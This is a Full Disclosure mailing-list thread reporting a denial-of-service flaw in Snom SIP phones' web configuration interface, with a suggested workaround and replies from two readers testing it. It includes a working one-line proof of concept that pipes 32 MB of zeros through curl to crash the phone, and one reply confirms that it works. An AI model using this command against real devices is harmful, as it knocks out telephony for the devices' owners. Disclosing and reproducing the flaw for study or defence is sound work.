Hi,
it works fine for me: dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP --data-binary @- Phone crashes after just a few seconds. Best Regards Max M. On 12.01.2015 22:20, Martin Schuhmacher wrote:
Hi i just did $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/ Response: Unauthorized request did i miss anything? Firmware: snom360-SIP 8.7.4.8 not downloadable any more for some reason? Yours Martin _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
On 12.01.2015 17:56, kape...@googlemail.com wrote:
Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration interface, which is enabled by default. By making a single HTTP POST request all available memory (and CPU) can be exhausted, resulting in a reboot of the phone. This even works if the HTTP/HTTPS interface is protected by username and password (probably the credentials are checked a few more lines later when the complete request has been received). Affected models: MP, 3XX, 7XX, 8XX (i didnt have any of the other models to test) Affected firmwares: latest stable, latest beta (most likely some others too) Workaround: Disable HTTP/HTTPS interface completely. Poc: dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE <http://ip_of_phone/> --data-binary @- P.S. Just if you are wondering.... I did not notify the vendor about this. Almost two years ago i reported multiple vulnerabilities directly to the vendor (including the possibility to install arbitrary software on the device), but not much has changed since then. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/